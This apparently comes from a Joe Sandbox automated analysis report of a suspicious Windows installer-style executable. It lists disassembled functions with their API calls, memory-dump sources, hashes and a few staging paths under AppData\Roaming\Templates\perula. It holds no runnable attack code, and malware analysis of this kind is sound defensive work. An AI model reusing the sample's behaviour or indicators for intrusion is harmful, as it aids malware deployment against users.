                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                                                                    • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                                                    • Instruction ID: b908bd292ce434c6339c018d18c1e3bfafdd2f7559b63d477f04a141d62eba1a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94D0123214020DFBDF119E909D01FAB775DAB08350F014426FE06A9191D776D530AB14
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                    • Opcode ID: 10905977528c235e703cb230d4aceb2daa77919a392825a775d9fd0059444441
                                                                                                                                                                                                                    • Instruction ID: 6c8b7a7afc7aeb3e996b6e5dc2b2c32cd2e79b991574bcf3a276c199f91445cd
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10905977528c235e703cb230d4aceb2daa77919a392825a775d9fd0059444441
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1D01232B04100D7DB10DBA4AF4899D73A49B84369B344577E102F11D0D6B9D9416A29
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00403347 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403355
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                    • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                                                    • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00404266 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                    • Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                                                                                                                                                                                    • Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 6F26121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,?,6F26123B,?,6F2612DF,00000019,6F2611BE,-000000A0), ref: 6F261225
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49589958063.000000006F261000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F260000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589926339.000000006F260000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589985935.000000006F264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49590017734.000000006F266000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_6f260000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocGlobal
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3761449716-0
                                                                                                                                                                                                                    • Opcode ID: ffe121fec7e2c30ebbf07021a53c20b9151e77b365cde406e779686ad97f0615
                                                                                                                                                                                                                    • Instruction ID: 3d5189bbf70af8ed062a50303be5ac785d3989865c865f10a7767f9b8344deeb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffe121fec7e2c30ebbf07021a53c20b9151e77b365cde406e779686ad97f0615
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4B01270A00410DFEE008B68CC4FF353294F705311F04C000FA00C0581C120C820CD34
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                    Function 00405461 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 004054BF
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004054CE
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040550B
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 00405512
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004055AE
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004055CF
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 004054DD
                                                                                                                                                                                                                      • Part of subcall function 00404266: SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405621
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405636
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 0040565A
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000008), ref: 0040565F
                                                                                                                                                                                                                    • ShowWindow.USER32(00000008), ref: 004056A9
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 004056EE
                                                                                                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00405722
                                                                                                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040573B
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405783
                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00405789
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0040579F
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004057D3
                                                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 004057E4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                    • String ID: {
                                                                                                                                                                                                                    • API String ID: 590372296-366298937
                                                                                                                                                                                                                    • Opcode ID: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
                                                                                                                                                                                                                    • Instruction ID: 0d33ea325d25f8e5d5623e6ebdd73ca6fcd7ab1b09301a5b30cdd6c49ec902ff
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7B15770900608FFDB119FA0DD89AAE7BB9FB48355F00403AFA41BA1A0CB755E51DF68
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00404722 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404771
                                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0040479B
                                                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040484C
                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404857
                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 00404889
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,Call), ref: 00404895
                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7
                                                                                                                                                                                                                      • Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,00000400,004048DE), ref: 00405917
                                                                                                                                                                                                                      • Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,77573420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                                                                                                                                                                      • Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                                                                                                                                                                      • Part of subcall function 0040654E: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,77573420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                                                                                                                                                                      • Part of subcall function 0040654E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,77573420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040496A
                                                                                                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985
                                                                                                                                                                                                                      • Part of subcall function 00404ADE: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                                                                                                                                                                      • Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
                                                                                                                                                                                                                      • Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                    • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula$Call
                                                                                                                                                                                                                    • API String ID: 2624150263-2694976400
                                                                                                                                                                                                                    • Opcode ID: 68aa07a1fe6bf47594d6bed69479b5c606ba263e933e44afd0ace3f0572c8061
                                                                                                                                                                                                                    • Instruction ID: 9ce2ccc5872d7715d19bac2dec5c0444f9ce2fea2c0a51142092d54e0f15b7c0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68aa07a1fe6bf47594d6bed69479b5c606ba263e933e44afd0ace3f0572c8061
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8A165B1A00208ABDB11AFA5CD45AAFB7B8EF84314F10847BF601B62D1D77C99418F6D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tilvirkninger\Jvndgns, xrefs: 004021C3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateInstance
                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tilvirkninger\Jvndgns
                                                                                                                                                                                                                    • API String ID: 542301482-3678015398
                                                                                                                                                                                                                    • Opcode ID: 85fa777544762f8280052d3ed6c1060dd403dfe718f2971fff495873814e0497
                                                                                                                                                                                                                    • Instruction ID: 47658dbbd12ee8008517b47355d5d9d52026a5fb35fba2bce99957a22e6c3eef
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85fa777544762f8280052d3ed6c1060dd403dfe718f2971fff495873814e0497
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B414C71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB44
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004072EC Relevance: 2.8, Strings: 2, Instructions: 300COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: p!C$p!C
                                                                                                                                                                                                                    • API String ID: 0-3125587631
                                                                                                                                                                                                                    • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
